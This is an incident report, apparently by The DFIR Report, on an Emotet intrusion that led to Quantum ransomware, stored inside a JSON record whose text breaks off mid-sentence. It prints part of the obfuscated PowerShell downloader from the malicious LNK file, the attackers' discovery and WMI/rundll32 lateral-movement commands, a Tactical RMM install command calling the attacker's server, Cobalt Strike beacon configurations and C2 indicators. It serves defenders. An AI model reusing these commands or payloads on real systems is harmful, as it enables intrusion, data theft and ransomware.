{ "id": "6e41299a-3659-41a0-92c8-afbce62c48da", "created_at": "2026-04-06T00:16:15.544156Z", "updated_at": "2026-04-10T03:38:09.866549Z", "deleted_at": null, "sha1_hash": "a33062f301411b934bbbd17ce600b4e994063a8e", "title": "Emotet Strikes Again - LNK File Leads to Domain Wide Ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2563765, "plain_text": "Emotet Strikes Again - LNK File Leads to Domain Wide\r\nRansomware\r\nBy editor\r\nPublished: 2022-11-28 · Archived: 2026-04-06 00:03:16 UTC\r\nIn June of 2022, we observed a threat actor gaining access to an environment via Emotet and operating over a\r\neight day period. During this time period, multiple rounds of enumeration and lateral movement occurred using\r\nCobalt Strike. Remote access tools were used for command and control, such as Tactical RMM and Anydesk. The\r\nthreat actors final actions included data exfiltration using Rclone and domain wide deployment of Quantum\r\nRansomware.\r\nWe have observed similar traits in previous cases where Emotet and Quantum were seen.\r\nCase Summary\r\nThe intrusion began when a user double clicked a LNK file, which then executed encoded Powershell commands\r\nto download an Emotet DLL onto the computer. Once executed, Emotet setup a Registry Run Key to maintain\r\npersistence on the beachhead host.\r\nEmotet, then proceeded to execute a short list of discover commands using the Windows utilities systeminfo,\r\nipconfig, and nltest targeting the network’s domain controllers. These commands would go on to be repeated daily\r\nby the Emotet process. Around one and one-half hours after execution, Emotet began sending spam emails,\r\nmailing new malicious attachments to continue spreading.\r\nSimilar activity continued over the second day, but on the third day of the incident, Emotet dropped a Cobalt\r\nStrike executable beacon onto the beachhead host. Using the Cobalt Strike beacon, the threat actors began\r\nconducting a new round of discovery activity. Windows net commands were run, targeting domain groups and\r\ncomputers, nltest was executed again, and they also used tasklist and ping to investigate a remote host.\r\nThe threat actor then moved laterally to a workstation. They first attempted this action using a PowerShell beacon\r\nand a remote service on the host, but while the script did execute on the remote host, it appeared to fail to connect\r\nto the command and control server. Next, they proceeded to transfer a beacon executable over SMB to the remote\r\nhost’s ProgramData directory. This beacon was then successfully executed via WMI and connected successfully to\r\nthe threat actors server.\r\nOnce on this new host the threat actors proceeded to run the net commands to review the Domain Administrators\r\ngroup again. They then proceeded to dump credentials from the LSASS process on the host. With some further\r\nprocess injection they then began to enumerate SMB shares across the environment and on finding a primary file\r\nserver reviewed several documents present on the server. This Cobalt Strike server stopped communicating shortly\r\nthere after.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 1 of 38\n\nOn the fourth day of the intrusion, Emotet dropped a new Cobalt Strike beacon. Again, some net command\r\ndiscovery was run for domain admins and domain controller servers. A flight of netlogon authentications were\r\nobserved from the beachhead host to the domain controller as a possible attempt at exploiting the domain\r\ncontroller.\r\nThe threat actors, however, proceeded along a more traditional path, using SMB file transfers and remote services\r\nto move laterally across domain controllers and several other servers in the environment using Cobalt Strike\r\nbeacon DLL’s. On the domain controller, the threat actors conducted further discovery tasks running find.bat\r\nand p.bat , which executed AdFind active directory discovery and performed a ping sweep across the\r\nenvironment.\r\nOn one of the other targeted servers, the threat actors deployed Tactical RMM, a remote management agent, for\r\nadditional access and persistence in the environment. From this server, the threat actors were observed using\r\nRclone to exfiltrate data from a file share server in the environment. The Mega.io service was the location the\r\nstolen data was sent.\r\nOn the fifth day of the intrusion, the threat actors appeared again to try and exfiltrate some data from the mail\r\nserver again using Rclone but this appeared to fail and the threat actors did not try to resolve the issue. After this\r\nthe threat actors went silent until the eighth and final day of the intrusion.\r\nOn the eighth day of the intrusion the threat actor accessed the environment using Tactical RMM to deploy\r\nAnydesk on the compromised host. After establishing a connection using Anydesk, the threat actors then dropped\r\nSoftPerfect’s Network Scanner and ran it to identify hosts across the environment.\r\nFrom there, the threat actors began connecting to other hosts via RDP, including the a backup server. After\r\nchoosing a new server and connecting via RDP, the threat actors dropped Powertool64.exe and dontsleep.exe\r\nin preparation for their final actions. Finally, locker.dll and a batch file 1.bat were dropped on the host and\r\nthe batch file was executed beginning the Quantum rasomware deployment to all hosts over SMB. From initial\r\nintrusion to ransomware deployment, 154 hours passed, over eight days.\r\nAfter ransomware deployment, the threat actors remained connected and did RDP to a few other servers and\r\nexecuted ProcessHacker.exe and a net command. With no other activity taking place, we assess that this was\r\nlikely the threat actors confirming successful deployment of the ransomware payload across the network.\r\nServices\r\nWe offer multiple services including a Threat Feed service which tracks Command and Control frameworks such\r\nas Cobalt Strike, BumbleBee, Covenant, Metasploit, Empire, PoshC2, etc. More information on this service and\r\nothers can be found here.\r\nBoth of the Cobalt Strike servers in this case were on our Threat Feed (days to months) in advance of this\r\nintrusion.\r\nWe also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs\r\nincluding Sysmon, Kape packages, and more, under our Security Researcher and Organization services.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 2 of 38\n\nTimeline\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 3 of 38\n\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 4 of 38\n\nReport Lead: @iiamaleks\r\nAnalysis and reporting: @samaritan_o, and @yatinwad\r\nInitial Access\r\nInitial access took the form of an LNK file delivered to a victim through a MalSpam campaign.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 5 of 38\n\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 6 of 38\n\nThe Powershell script embedded within the LNK is a Base64 encoded script with various components split into\r\ndifferent variables for obfuscation purposes. The script will decode itself rather than depend on Powershell’s built-in ability to execute encoded scripts.\r\n..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c \"\u0026{'p8ArwZsj8ZO+Zy/dHPeI+siGhbaxtEhzw\r\nVsLWVuZXJnaWFraS5nci93cC1pbmNsdWRlcy9JZHJWS09HWU1Rb2R1N0lsT0loLyIsImh0dHA6Ly9kcmVjaHNsZXJzdGFtbXRpc2N\r\nvIiwiaHR0cDovL2RpbHNybC5jb20vcGhvbmUvcGZpcDVtLyIpOyR0PSJuZldGUSI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAt\r\nZjtSZWdzdnIzMi5leGUgIiRkXGp4S1BJck1GeEouT09mIjticmVha30gY2F0Y2ggeyB9fQ==';$KOKN='ICBXcml0ZS1Ib3N0ICJB\r\nKN=$KOKN+$BxQ;$GBUus=$KOKN;$xCyRLo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase\r\nThe Powershell script, when double clicked (executed), will attempt to connect to a set of domains containing the\r\nEmotet malware. Upon successful download of the Emotet malware, the PowerShell script will write it to a\r\ntemporary directory and execute the payload via regsvr32.exe .\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 7 of 38\n\nIt is interesting to note, the LNK identifies the machine it was created on through the NetBIOS name of black-dog and a MAC Address beginning with 08:00:27 indicating a system running on Virtualbox.\r\nMachine ID: black-dog\r\nMAC Address: 08:00:27:c6:74:5d\r\nMAC Vendor: PCS SYSTEMTECHNIK\r\nCreation: 2022-05-12 15:33:49\r\nExecution\r\nOnce the PowerShell script from the LNK file executed successfully, Emotet began execution. Emotet will\r\ninitially copy itself to a randomly named folder in the users temporary folder.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 8 of 38\n\nMultiple instances of Emotet spawning itself was observed over a period of three days. Almost all the instances of\r\nEmotet included three enumeration commands executed:\r\nsysteminfo\r\nipconfig /all\r\nnltest /dclist:\r\nTowards the third and fourth day of the intrusion, Cobalt Strike was dropped to disk as a PE executable and\r\nexecuted. This access was used to perform enumeration and move laterally to other hosts.\r\nThe following diagram aims to provide an illustration of the execution chain with multiple instances of Emotet\r\nleading to Cobalt Strike.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 9 of 38\n\nPersistence\r\nThe Emotet malware has used various persistence methods over time, an example can be seen here.\r\nOn the first day, Emotet established persistence via a run key.\r\nAs we can see, the regsvr32.exe Windows’s native utility was used to launch the Emotet DLL.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 10 of 38\n\nAfter moving to the hands on keyboard phase of the intrusion, the threat actors proceeded to deploy several\r\nremote management tools across the environment. Tactical RMM was the first tool chosen for deployment.\r\nTactical RMM is a remote management software platform that uses a combination of agents to allow for remote\r\nmanagement and access to systems.\r\nThe file 17jun.exe, was deployed into the programdata folder on one of the servers. This was then executed by\r\nthe threat actors and resulted in the installation of the main RMM agent. The install completed with the following\r\ncommand.\r\n\"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m install --api https://api.floppasoftware[.]com --\r\nA service was also created for the agent.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 11 of 38\n\nEvent 7045\r\nA service was installed in the system.\r\nService Name: TacticalRMM Agent Service\r\nService File Name: \"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m svc\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nAlong with the tacticalrmm.exe client, a second executable called meshagent.exe, was installed to handle\r\nremote session interaction, and a separate service was created for that agent.\r\nEvent 7045\r\nA service was installed in the system.\r\nService Name: Mesh Agent\r\nService File Name: \"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\"\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nOn the final day of the intrusion, the threat actors added AnyDesk to the same server running Tactical RMM,\r\nproviding an additional means of access prior to the deployment of ransomware.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 12 of 38\n\nEvent 7045\r\nA service was installed in the system.\r\nService Name: AnyDesk Service\r\nService File Name: \"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service\r\nService Type: user mode service\r\nService Start Type: auto start\r\nService Account: LocalSystem\r\nPrivilege Escalation \r\nWe suspect a failed ZeroLogon exploit was attempted against a domain controller, originating from the beachhead\r\nhost with Cobalt Strike running on it. One indicator is the ‘mimikatz’ string in the Netlogon event that is used by\r\nthe Mimikatz Zerologon implementation.\r\nDuring a period of a few seconds, multiple NetrServerReqChallenge and NetrServerAuthenticate2 methods in the\r\ntraffic from a single source were observed, this is one of the indicators of a Zerologon attempt.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 13 of 38\n\nDefense Evasion\r\nProcess Injection\r\nThe threat actor was observed process injecting into legitimate process and using them to execute their own tasks\r\non the system, this can be seen from Winlogon connecting to a domain associated with a Cobalt Strike server and\r\nremoving files from the system.\r\nThe specific mechanism used to inject into a foreign process, was injecting arbitrary code into its memory space,\r\nand executing it as a remotely created thread. This occurred from rundll32.exe, which was previously used to\r\nexecute and run Cobalt Strike.\r\nThe following table summarizes the processes used for injection during this case:\r\nInjected Process Name Injection Payload\r\nC:\\Windows\\system32\\winlogon.exe Cobalt Strike\r\nC:\\Windows\\System32\\RuntimeBroker.exe Cobalt Strike\r\nC:\\Windows\\System32\\svchost.exe Cobalt Strike\r\nC:\\Windows\\System32\\taskhostw.exe Cobalt Strike\r\nC:\\Windows\\system32\\dllhost.exe Cobalt Strike\r\nPowerTool\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 14 of 38\n\nPowerTool was observed, dropped and executed on the server used to deploy the ransomware payload. This tool\r\nhas the ability to kill a process, delete its process file, unload drivers, and delete the driver files. It has been\r\nreportedly used by several ransomware groups to aid in their operations [1][2][3][4].\r\nAs a byproduct of execution, PowerTool will drop a driver to disk and load it into the system.\r\nDriver Signature Name: 北京华林保软件技术有限公司\r\nIndicator Removal\r\nThe threat actor was observed deleting files that had been dropped to disk.\r\nCredential Access\r\nProcess access to LSASS was observed, likely to dump credentials from a process that was injected with Cobalt\r\nStrike. The Granted Access level matches know indicators for Mimikatz with an access value of 0x1010 (4112), as\r\nwe covered in a prior report.\r\nWe also observed a Cobalt Strike executable request access level of 0x0040 (64) to LSASS, as well indicating\r\nother credential access tools may have been in use by the threat actor.\r\nDiscovery\r\nDuring the initial Emotet execution, three automated discovery commands were observed. These were then\r\nrepeated, seen occurring once a day from the Emotet host.\r\nsysteminfo\r\nipconfig /all\r\nnltest /dclist:\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 15 of 38\n\nMultiple commands responsible for enumerating Active Directory groups, domain joined computers, and domain\r\ntrusts, were executed via Cobalt Strike on the beachhead.\r\nwhoami /groups\r\nnet group /domain\r\nnet group \"domain computers\" /domain\r\nnet group /domain \"Domain controllers\"\r\nnet group \"domain admins\" /domain\r\nnltest /trusted_domains\r\nThe threat actor was observed querying a non-existent group Domain controller, followed by a command\r\ncorrecting the mistake that queried the group Domain controllers .\r\nnet group /domain \"Domain controller\"\r\nnet group /domain \"Domain controllers\"\r\nA ping command issued to a user workstation and a domain controller were observed moments before lateral\r\nmovement was attempted.\r\nping COMPUTER.REDACTED.local\r\nInvoke-ShareFinder was observed being used via Powershell in the environment from an injected process with\r\nCobalt Strike:\r\nIn addition to the Invoke-ShareFinder command, other functions that were used by the script were also\r\nobserved.\r\nThe remnants of Invoke-ShareFinder could also be seen on the network through the consistent querying of\r\n“ADMIN$” and “C$” shares for each host over a short period of time. In addition to these shares, a few shares\r\nfrom the file servers were also accessed.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 16 of 38\n\nOnce on the domain controller, two batch files were run. The first find.bat was used to run AdFind.exe for\r\nActive Directory discovery.\r\nfind.exe -f \"objectcategory=computer\"\r\nfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nfind.exe -subnets -f (objectCategory=subnet)\r\nfind.exe -f \"(objectcategory=group)\"\r\nfind.exe -gcb -sc trustdmp\r\nThe second script, p.bat, was run to sweep the network using ping, looking for network connectivity and online\r\nhosts.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 17 of 38\n\nOn the final day, prior to ransom deployment, the threat actor also dropped netscan.exe on the server, and\r\nexecuted it from the Tactical RMM meshagent.exe session.\r\nC:\\Windows\\System32\\mstsc mstsc.exe /v:IP_ADDRESS_1\r\nC:\\Windows\\System32\\mstsc mstsc.exe /v:IP_ADDRESS_2\r\nC:\\Windows\\SysWOW64\\explorer.exe \"C:\\Windows\\SysWOW64\\explorer.exe\" \\\\IP_ADDRESS_1\\C$\r\nC:\\Windows\\SysWOW64\\explorer.exe \"C:\\Windows\\SysWOW64\\explorer.exe\" \\\\IP_ADDRESS_2\\C$\r\nLateral Movement\r\nCobalt Strike Remote Service Creation\r\nThe threat actor was observed creating remote services in order to execute beacon DLL files transferred via SMB\r\nas SYSTEM on remote hosts.\r\nC:\\Windows\\System32\\cmd.exe /c rundll32.exe C:\\ProgramData\\x86.dll, StartA\r\nWMI\r\nIn another instance, an executable Cobalt Strike beacon was copied via SMB to a target machine, and then\r\nexecuted via WMI.\r\nwmic /node:IP_Address process call create \"cmd.exe /c start C:\\Progradata\\sc_https_x64.exe\"\r\nRemote Desktop\r\nLastly, traces of RDP (Remote Desktop Protocol) connections were discovered on multiple compromised hosts\r\nutilized for lateral movement on the final day of the intrusion and during the ransomware deployment.\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 18 of 38\n\nCollection\r\nOn the third day of the intrusion, after moving laterally, the threat actors began to review sensitive documents\r\nstored on network shares, including revenue, insurance, and password storage documents.\r\nThese documents were again reviewed by the threat actor on the final day of the intrusion. Later the threat actor\r\nviewed the stolen files off network, observed by triggered canary tokens, which revealed connections from an\r\nAWS EC2 instance.\r\nCommand and Control\r\nEmotet\r\nThe Emotet loader pulled the main second stage payload from the following domains:\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 19 of 38\n\nhxxps://descontador[.]com[.]br\r\nhxxps://www.elaboro[.]pl\r\nhxxps://el-energiaki[.]gr\r\nhxxp://drechslerstammtisch[.]de\r\nhxxp://dhnconstrucciones[.]com[.]ar\r\nhxxp://dilsrl[.]com\r\nThe second stage loader had multiple IP addresses in its configuration to attempt connections to:\r\n103.159.224.46\r\n103.75.201.2\r\n119.193.124.41\r\n128.199.225.17\r\n131.100.24.231\r\n139.59.60.88\r\n144.217.88.125\r\n146.59.226.45\r\n149.56.131.28\r\n159.89.202.34\r\n165.22.211.113\r\n165.227.166.238\r\n178.128.82.218\r\n209.126.98.206\r\n213.32.75.32\r\n37.187.115.122\r\n45.226.53.34\r\n45.55.134.126\r\n46.55.222.11\r\n51.210.176.76\r\n51.254.140.238\r\n54.37.70.105\r\n82.223.82.69\r\n91.207.181.106\r\n92.114.18.20\r\n94.23.45.86\r\n96.125.171.16\r\nCobalt Strike\r\nThe following Cobalt Strike C2 servers were observed being used. Both HTTP and HTTPS were observed to be\r\nused.\r\n139.60.161.167 (survefuz[.]com)\r\n139.60.160.18 (juanjik[.]com)\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 20 of 38\n\n139.60.161.167 (survefuz[.]com)\r\nJA3s: 211897664d51cffdfd7f78d684602ecc\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nCertificate: 03:4e:01:cb:d0:d4:40:24:ad:e0:cd:81:9f:00:44:0f:1e:de\r\nNot Before: May 24 11:25:15 2022 GMT\r\nNot After: Aug 22 11:25:14 2022 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: survefuz[.]com\r\nPublic Algorithm: id-ecPublicKey\r\n139.60.160.18 (juanjik[.]com)\r\nJA3s: 211897664d51cffdfd7f78d684602ecc\r\nJA3: a0e9f5d64349fb13191bc781f81f42e1\r\nCertificate: 04:ea:aa:59:1e:c6:50:6e:d3:70:d4:24:50:f0:a5:30:9a:e6\r\nNot Before: Jun 14 17:38:08 2022 GMT\r\nNot After: Sep 12 17:38:07 2022 GMT\r\nIssuer Org: Let's Encrypt\r\nSubject Common: juanjik[.]com\r\nPublic Algorithm: rsaEncryption\r\nThe following are the Cobalt Strike configurations observed:\r\n139.60.161.167 (survefuz[.]com)\r\n{\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"sleeptime\": 45000,\r\n \"jitter\": 37,\r\n \"maxgetsize\": 1403644,\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"license_id\": 206546002,\r\n \"cfg_caution\": false,\r\n \"kill_date\": null,\r\n \"server\": {\r\n \"hostname\": \"survefuz[.]com\",\r\n \"port\": 80,\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqoyVkBHx713LeUHmw7FAozt15LWTMgX1nCLSXECllryU\r\n },\r\n \"host_header\": \"\",\r\n \"useragent_header\": null,\r\n \"http-get\": {\r\n \"uri\": \"/jquery-3.3.1.min.js\",\r\n \"verb\": \"GET\",\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 21 of 38\n\n\"client\": {\r\n \"headers\": null,\r\n \"metadata\": null\r\n },\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n }\r\n },\r\n \"http-post\": {\r\n \"uri\": \"/jquery-3.3.2.min.js\",\r\n \"verb\": \"POST\",\r\n \"client\": {\r\n \"headers\": null,\r\n \"id\": null,\r\n \"output\": null\r\n }\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"crypto_scheme\": 0,\r\n \"proxy\": {\r\n \"type\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"http_post_chunk\": 0,\r\n \"uses_cookies\": true,\r\n \"post-ex\": {\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\",\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\"\r\n },\r\n \"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 22 of 38\n\n\"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\n139.60.160.18:80 (juanjik[.]com)\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"dns_beacon\": {},\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\"\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 23 of 38\n\n},\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform_x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform_x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"startrwx\": false,\r\n \"min_alloc\": \"17500\",\r\n \"userwx\": false,\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"NtMapViewOfSection\"\r\n },\r\n \"uses_cookies\": true,\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {},\r\n \"maxgetsize\": \"1403644\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm\r\n \"port\": \"443\",\r\n \"hostname\": \"juanjik[.]com\"\r\n },\r\n \"beacontype\": [\r\n \"HTTPS\"\r\n ],\r\n \"license_id\": \"206546002\",\r\n \"jitter\": \"37\",\r\n \"sleeptime\": \"45000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 24 of 38\n\n\"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n },\r\n \"client\": {\r\n \"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/jquery-3.3.1.min.js\"\r\n },\r\n \"cfg_caution\": false,\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/jquery-3.3.2.min.js\"\r\n }\r\n}\r\n139.60.160.18:443 (juanjik[.]com)\r\n{\r\n \"spawnto\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"dns_beacon\": {},\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"post_ex\": {\r\n \"spawnto_x64\": \"%windir%\\\\sysnative\\\\dllhost.exe\",\r\n \"spawnto_x86\": \"%windir%\\\\syswow64\\\\dllhost.exe\"\r\n },\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"process_inject\": {\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform_x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 25 of 38\n\n],\r\n \"transform_x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"startrwx\": false,\r\n \"min_alloc\": \"17500\",\r\n \"userwx\": false,\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"allocator\": \"NtMapViewOfSection\"\r\n },\r\n \"uses_cookies\": true,\r\n \"http_post_chunk\": \"0\",\r\n \"ssh\": {},\r\n \"maxgetsize\": \"1403644\",\r\n \"proxy\": {\r\n \"behavior\": \"Use IE settings\"\r\n },\r\n \"tcp_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"server\": {\r\n \"publickey\": \"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAm\r\n \"port\": \"80\",\r\n \"hostname\": \"juanjik[.]com\"\r\n },\r\n \"beacontype\": [\r\n \"HTTP\"\r\n ],\r\n \"license_id\": \"206546002\",\r\n \"jitter\": \"37\",\r\n \"sleeptime\": \"45000\",\r\n \"http_get\": {\r\n \"server\": {\r\n \"output\": [\r\n \"print\",\r\n \"append 1522 characters\",\r\n \"prepend 84 characters\",\r\n \"prepend 3931 characters\",\r\n \"base64url\",\r\n \"mask\"\r\n ]\r\n },\r\n \"client\": {\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 26 of 38\n\n\"metadata\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"GET\",\r\n \"uri\": \"/jquery-3.3.1.min.js\"\r\n },\r\n \"cfg_caution\": false,\r\n \"host_header\": \"\",\r\n \"crypto_scheme\": \"0\",\r\n \"http_post\": {\r\n \"client\": {\r\n \"output\": [],\r\n \"id\": [],\r\n \"headers\": []\r\n },\r\n \"verb\": \"POST\",\r\n \"uri\": \"/jquery-3.3.2.min.js\"\r\n }\r\n}\r\nTactical RMM Agent\r\nThe threat actor dropped a Tactical RMM Agent on one of the servers as an alternative command and control\r\navenue to access the network. During the installation of the software, the following command was observed:\r\n\"C:\\Program Files\\TacticalAgent\\tacticalrmm.exe\" -m install --api https://api.floppasoftware[.]com --\r\nThis command reveals the floppasoftware.com domain used by the threat actor for the remote management of\r\nTactical RMM Agent. This domain was registered very close to the timeline of this incident.\r\nA domain registered to be used with Tactical RMM Agent will have both an api and mesh subdomain, in this\r\ncase api.floppasoftware[.]com and mesh.floppasoftware[.]com . These were both hosted on the same server\r\nIP: 212.73.150.62.\r\nIn addition, during the execution of Tactical RMM Agent, the software will reach out to a centralized domain in\r\norder to retrieve the current public IP address in use:\r\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\r\nPage 27 of 38\n\nicanhazip.tacticalrmm.io\r\nAnyDesk\r\nOn the final day of the intrusion, AnyDesk was deployed on the server they had previously installed 